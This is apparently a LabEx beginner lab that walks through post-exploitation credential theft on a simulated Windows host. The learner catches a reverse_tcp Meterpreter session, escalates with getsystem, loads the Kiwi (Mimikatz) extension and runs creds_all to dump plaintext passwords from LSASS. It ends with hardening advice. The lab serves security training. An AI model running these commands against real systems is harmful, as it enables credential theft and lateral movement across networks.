LabEx
Log InJoin Free

Use Kiwi to Extract Plaintext Passwords in Meterpreter

Kali LinuxBeginner
Practice Now

Introduction

In the post-exploitation phase of a penetration test, one of the primary goals is to gather credentials to move laterally across the network. Metasploit's Meterpreter is a powerful payload that provides an interactive shell on a compromised system.

One of Meterpreter's most potent features is the Kiwi extension, which is a port of the famous Mimikatz tool. Kiwi allows attackers to extract plaintext passwords, hashes, PINs, and Kerberos tickets directly from the memory of the target machine, specifically from the Local Security Authority Subsystem Service (LSASS) process.

In this lab, you will learn how to load and use the Kiwi extension within a Meterpreter session to dump credentials from a simulated Windows target.

Gain a Meterpreter session with SYSTEM privileges on a Windows target

In this step, we will simulate gaining access to a target machine. In a real-world scenario, you would use an exploit to deliver a payload. Here, we will set up a listener using the Metasploit Framework console. A simulated target will then connect to our listener, providing us with a Meterpreter session.

First, start the Metasploit console. The -q flag makes it start quietly without showing the banner.

msfconsole -q

Next, we will configure a listener to "catch" the incoming connection from the simulated target. We use the multi/handler module for this.

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444

Now, run the listener as a background job using exploit -j.

exploit -j

After a few moments, a session will be created. You can list active sessions with the sessions command.

sessions

You should see an output indicating an active session, similar to this:

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  1         meterpreter x86/windows  WIN-TARGET\LabUser @ WIN-TARGET  127.0.0.1:4444 -> 127.0.0.1:54321 (...)

Now, interact with session 1.

sessions -i 1

Your prompt will change to meterpreter >. To use Kiwi effectively, we need the highest level of privileges, NT AUTHORITY\SYSTEM. We can attempt to escalate our privileges using the getsystem command.

getsystem

You should see a ...got system message. Verify your new identity by running getuid.

getuid

The expected output should be:

Server username: NT AUTHORITY\SYSTEM

You now have a Meterpreter session with SYSTEM privileges, ready for the next steps.

Load the kiwi extension using the load kiwi command

In this step, you will load the Kiwi extension into your Meterpreter session. Meterpreter is modular, and its extensions provide additional functionality that is not loaded by default to keep the initial payload small. The Kiwi extension contains all the commands needed to perform Mimikatz-style credential dumping.

From your meterpreter > prompt, use the load command to add the Kiwi extension.

load kiwi

If the command is successful, Meterpreter will confirm that the extension has been loaded.

Loading extension kiwi...Success.

With the Kiwi extension loaded, you now have access to a new set of powerful commands for credential harvesting.

List available kiwi commands with help

In this step, you'll verify that the Kiwi commands are available. After loading any extension in Meterpreter, you can use the help command to see an updated list of all available commands. This is a good practice to confirm that the extension loaded correctly and to see what new capabilities you have.

From the meterpreter > prompt, simply type help.

help

The output will be a long list of all Meterpreter commands, grouped by section. Scroll through the output, and you should find a new section named "Kiwi Commands". This section lists all the functions provided by the Kiwi extension.

...
Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve MSV credentials (parsed)
    creds_ssp              Retrieve SSP credentials (parsed)
    creds_tspkg            Retrieve TSPKG credentials (parsed)
    creds_wdigest          Retrieve WDigest credentials (parsed)
    dcsync                 Retrieve user account information via DCSync
    dcsync_ntlm            Retrieve user NTLM hash via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute a custom command
    lsa_dump_sam           Dump LSA SAM
    lsa_dump_secrets       Dump LSA secrets
    wifi_list              List wifi profiles/creds
    wifi_list_shared       List shared wifi profiles/creds
...

As you can see, Kiwi adds many powerful commands for interacting with Windows authentication mechanisms.

Dump all available credentials with the creds_all command

In this step, you will execute the primary command from the Kiwi extension to dump all credentials found in memory. The creds_all command is a convenient wrapper that runs several different credential-gathering modules at once, targeting various authentication packages like WDigest, Kerberos, and MSV.

Remember, this command requires SYSTEM privileges to access the LSASS process memory, which is why we performed the getsystem command in the first step.

From your meterpreter > prompt, run the creds_all command.

creds_all

The command will take a moment to run as it inspects the LSASS process. The output will be detailed, showing credentials found for different providers. Below is a sample of what you might see.

[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

AuthID      Package  Domain      User        Password
------      -------  ------      ----        --------
0;109871    NTLM     WIN-TARGET  LabUser     (null)
0;99876     NTLM     WIN-TARGET  WIN-TARGET$ (null)

wdigest credentials
===================

AuthID      Package  Domain      User        Password
------      -------  ------      ----        --------
0;109871    WDigest  WIN-TARGET  LabUser     P@ssword123!
0;99876     WDigest  WIN-TARGET  WIN-TARGET$ (null)

kerberos credentials
====================

AuthID      Package   Domain      User        Password
------      -------   ------      ----        --------
0;109871    Kerberos  WIN-TARGET  LabUser     P@ssword123!
0;99876     Kerberos  WIN-TARGET  WIN-TARGET$ (null)
...

You have successfully dumped credentials from the target system's memory. The next step is to analyze this output.

Analyze the output for plaintext passwords

In this final step, you will analyze the output from the creds_all command to identify plaintext passwords. The ability to find cleartext credentials is what makes tools like Kiwi and Mimikatz so powerful for lateral movement.

Look through the output you received in the previous step. The data is organized by authentication package:

  • msv: This package handles standard NTLM authentication. It typically provides password hashes, not plaintext passwords, unless the user has recently logged in interactively.
  • wdigest: On older Windows systems or systems where it's explicitly enabled, WDigest stores a reversible encrypted copy of the user's password in memory. Kiwi can easily decrypt this, revealing the plaintext password. This is often the most valuable section.
  • kerberos: This package manages Kerberos tickets. Similar to WDigest, it can also cache plaintext passwords for logged-on users.
  • ssp and tspkg: These packages handle credentials for other services, like Remote Desktop connections.

In the sample output from the previous step, you can clearly see a plaintext password for the user LabUser in both the wdigest and kerberos sections:

wdigest credentials
===================
...
0;109871    WDigest  WIN-TARGET  LabUser     P@ssword123!
...

kerberos credentials
====================
...
0;109871    Kerberos  WIN-TARGET  LabUser     P@ssword123!
...

By carefully examining the output and looking for non-(null) values in the Password column, you can harvest valuable credentials. This information could then be used to access other systems or services as that user.

Summary

In this lab, you successfully performed a classic post-exploitation technique. You started by gaining a Meterpreter session with SYSTEM privileges on a simulated Windows target. You then loaded the Kiwi extension, which integrates the functionality of Mimikatz into Meterpreter.

Using the creds_all command, you dumped credentials directly from the LSASS process memory. Finally, you analyzed the output to extract a plaintext password for a logged-on user.

This exercise highlights the importance of security hardening on endpoints. Defenses against this type of attack include:

  • Disabling WDigest authentication.
  • Enabling LSA Protection (RunAsPPL).
  • Implementing the principle of least privilege to ensure users and processes do not have unnecessary administrative rights.

You now have a practical understanding of how attackers can leverage in-memory credential dumping to further compromise a network.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux